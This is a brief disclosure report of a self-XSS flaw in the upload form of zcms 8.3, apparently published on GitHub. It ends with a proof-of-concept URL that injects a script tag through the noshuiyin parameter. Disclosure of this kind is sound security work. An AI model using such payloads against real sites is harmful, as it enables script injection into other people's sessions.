Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
17 lines (14 sloc) 588 Bytes

Component

zzcms 8.3 Download link:http://www.zzcms.net/about/6.htm

Vulnerability location

/uploadimg_form.php line 66 noshuiyin parameter Directly from user input and no security filtering that cause a self_xss

Vulnerability trigger condition

Triggered after user or admin login

POC

http://192.168.30.216/uploadimg_form.php?noshuiyin="><script>alert(1)</script>"

You can’t perform that action at this time.